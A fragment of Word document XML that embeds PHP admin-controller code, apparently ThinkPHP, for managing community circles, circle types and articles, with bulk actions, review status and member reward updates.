    <w:p w14:paraId="4B726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Db::name('circle_type')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB17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667A4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61106E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E7240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10113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1EC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5A2769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Db::name('circle_type')-&gt;where('id', $id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35141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F7C2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38409E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20BF4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3FBFFC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4DEE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D34D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862D7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'post</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E28F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B3B4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129AD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37001D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Db::name('circle_type')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A77A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7B3BE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 $type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44685C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2A07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112C5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1209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FE42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573AA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7613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CC893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DB36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delete_type()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC4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D872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49A98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19D0E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7F6EB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555A9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$circle_count = Db::name('circle')-&gt;where('type_id', $id)-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100553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($circle_count &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37541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Db::name('circle_type')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F55B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555AB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42A454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53D8B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1517C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8A8F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ABFB0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属性下有文章，请先删除文章对应属性</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E66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081B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F119E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41EB6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BE37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F6627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4D0C7F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9542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0355A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CBE0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7D693D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5AA2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$types = Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352688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2245A6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input('type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651D4F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 = input('search_name', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308B6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Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701338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 id desc');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7E4A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($type_id != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040B7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$query-&gt;where('type_id', $type_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46974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12D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($search_name != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A461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$query-&gt;where('title', 'like', '%' . $search_name . '%');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3F09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6BD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$query-&gt;paginate('', false, ['query' =&gt; request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785C94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12C4D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$this-&gt;assign('type_id', $type_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247948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$this-&gt;assign('types', $types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDD9D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$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEE2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4DB49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52193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122F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18BA4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4072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$types = Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496AE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 id asc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2639EC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1727C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$this-&gt;assign('types', $types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D383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input('param.id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210299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7BD9C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6BDD14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(!$post['member_id']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6E7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$post['member_id'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E3DD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EB851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($post['type_id'] &lt;= 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20243A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请选择社区分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D93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866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($post['update_time']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3021B9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strtotime($post['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CA0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8DB9F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3C8341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6C0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 = $time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567D7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(!empty($post['content'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27814B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$post['content'] = htmlspecialchars_decode($post['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263880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A77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139806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($post['title']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4BE9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$titled_circle = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D49F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$post['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791F7A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7A986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($titled_circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8DB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相同名称社区已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50743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8FE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B607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 = $time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124863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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1D08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-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE2A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245493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5BA294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72916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4E5B7C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D55A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1EACF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($post['title']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082734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$titled_circle = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630296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'&lt;&gt;', $id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7565D5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$post['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECBA8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6094F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($titled_circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E43EB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相同名称社区已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EACC8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905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BC1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266D9F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5683F4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-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F44FC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4863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1C9C7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896AA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071EF7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FB9A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758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B0531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5158C4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$circle = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556EFC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1DC7C5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3E15C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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A65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$this-&gt;assign('type_id', $circle['type_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544EE7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$this-&gt;assign('circle', $circle);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720EE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09D5A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6FA37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384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3A3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54A18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7574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8F7C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B13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delete()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A72D2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066E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3BC0AD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69D37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70441D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003D5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Db::name('circle')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1B3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4B223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7B3ABD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77790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60ECB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5667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4CCF3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559B3F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DFE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B8823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00C53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F38D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597B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4235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articles()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F12A4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4F4D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$circle_id = input('param.circle_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124FB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 = input('param.search', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184E7B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Db::name('circle_article');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EA40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($circle_id != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C8E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$query-&gt;where('circle_id', $circle_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74684C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50F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($search != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBE43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$query-&gt;where('title', 'like', '%' . $search . '%');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3CFF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1DB3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$query-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B87CC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$articles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CDEA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DAEFB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ED96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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A10D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A28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$id = input('param.article_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A98B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 = input('param.search', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5E5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3DE950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3AC833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2D668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$this-&gt;assign('circles', $circles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B753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0107F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290263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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC235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449ABA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7EE6C9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Db::name('circle_article')-&gt;where('title', $post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D357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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E3B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相同标题文章已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F24A2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8746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 = $time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB131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Db::name('circle_article')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCE6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685118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0A1B44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(isset($post['circle_id'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5327B3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$post['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35130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-&gt;setInc('article_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362E17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35D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AB048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47D8E4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CAC7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0C5AFC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($post['title']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19868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$titled_article = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587D3F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'&lt;&gt;', $id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FBD9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$post['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D945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713D4F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($titled_article) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582E96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相同标题文章已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E412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7A9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3F78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271179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646633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FD14F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 = $time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE57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Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF5E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51B1DE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-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC0BA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FCD1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4A1924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(isset($post['circle_id']) &amp;&amp; $article['circle_id'] != $post['circle_id']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419AD4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$post['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE02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-&gt;setInc('article_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1191F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$article['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A7C4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-&gt;setDec('article_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472899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981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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152D59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07C664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F8A1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5501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1257D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'post</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164BB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9E2B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BE761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Db::name('circle_article');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5697AC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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BFCC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$query-&gt;where('id', $id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401E26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A5E3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($search != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1BB3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$query-&gt;where('title', 'like', '%' . $search . '%');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C888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360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$query-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E2DA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$this-&gt;assign('article', $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE6D5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54A0E7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D57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68050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9C98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add_article()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2993AF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D03A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input('article_id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6933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7AE4F3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3C5383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ADB91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$this-&gt;assign('circles', $circles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045FA6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648C1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6D88FB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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B328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1D0496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5400EC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Db::name('circle_article')-&gt;where('title', $post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428EE2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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8684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相同标题文章已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098E56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8C5B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 = $time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0791D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Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B6F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-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06587D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BD718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55C066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(isset($post['circle_id'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512B83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$post['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5FB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-&gt;setInc('article_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E7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1F5A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CE5AB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6200C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7AC7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2852D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(isset($post['title'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF06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$titled_article = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B42A8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'&lt;&gt;', $id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274C6B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$post['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BD4D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E3FE5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($titled_article) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6459D3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相同标题文章已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650CA5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2BF4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571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6EADA3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1668B6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A1E3D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 = $time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05315E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Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52092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43E04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-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEF66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435B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0CE82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($article['circle_id'] != $post['circle_id']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D51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$post['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269A89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-&gt;setInc('article_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AB6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$article['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7875C9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-&gt;setDec('article_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C794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8A36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965A3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5B3798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D779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6A94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2CC4F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'post</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63127C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3857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7700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0EE86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Db::name('circle_article')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FBBC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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B777C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$this-&gt;assign('article', $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E5C1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64A5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2BF41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69BA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1E50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61FD88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5B2D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2F06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F90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desAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDB59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F48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42375C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60D237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($post['des'] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB2D9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intval($k);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1742BE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intval($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76982F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476A1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-&gt;where('id', $id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC3D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-&gt;setField('des', $name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410E9D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AEE4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更新排序成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1877C0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50F60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提交类型错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A018D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9EA9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9E484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AB90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delAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D89E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52B8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737861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6C3C1D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(input('?post.delAll')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59521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$post['delAll'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C80FA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Db::name('circle')-&gt;delete($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B18C5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40579D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7C4DC3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E5978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595E81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A781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A1928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删除失败，未选中数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423EAC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799D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9A2F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提交类型错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6186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81DB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BDE3A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80F8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all()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C62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925A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0697B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05F40F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input('type');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A3C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(input('?post.delAll')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BB6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$post['delAll'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA9A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1142E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($post as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0E54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 'del') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CAA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$db-&gt;delete($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774E5E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4950F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$db-&gt;where('id', $v)-&gt;setField('hide', $type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358F5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FADA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9627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147AE2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4952AC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3AD5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2B5F71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94F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9F45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删除失败，未选中数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9923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7004E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1E21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提交类型错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28919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562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9381D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D239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63F22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9A12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1DBE45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 ? input('id') : '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278EA4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input('type') ? input('type') : '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263FA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['0' =&gt; '&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>禁止</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;', '1' =&gt; '&lt;font color="#1ab394"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;', '2' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', '3' =&gt; '&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73435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78F92B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 = Db::name('circle')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FF4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($aritlce['uid']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DAC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 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04133B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管理员设置隐藏状态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D123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($type == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224DD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拒绝通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E01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($type == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D517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管理员设置审核状态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F4A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25D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DC66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($aritlce['uid'] &amp;&amp; $type == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5C78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DB::name('member_config')-&gt;where("name='articleAdd' or name='articleHide' or name='articleScore' or name='articleNum' or name='articleCode' or name='articleJingyan' or name='articleMoney'")-&gt;fetchSql(false)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49759B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$articleAdd = $data['0']['text'];     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE234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$articleHide = $data['1']['text'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64129C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$articleScore = $data['2']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39169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$articleNum = $data['3']['text'];     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329B7C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$articleCode = $data['4']['text'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FFCC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$articleJingyan = $data['5']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6402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$articleMoney = $data['6']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AE66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5DA64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($articleMoney) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAC54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'money',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'data' =&gt; '+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441FB1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(!$aritlcejiance) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE4E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$articleMoney, 'money', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD52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$aritlce['uid'])-&gt;setInc('money', $articleMoney);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B05A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9B7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DA0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($articleScore) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657F18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'score',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'data' =&gt; '+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D11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(!$aritlcejiance) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3B3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$articleScore, 'score', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FE7F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$aritlce['id'])-&gt;setInc('score', $articleScore);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5B8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C74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45A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($articleJingyan) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1505F1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'jingyan',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'data' =&gt; '+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200DC8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(!$articleJingyan) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE25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$articleJingyan, 'jingyan', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4619A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$this-&gt;member['id'])-&gt;setInc('jingyan', $articleJingyan);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A07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BB35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F12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审核通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
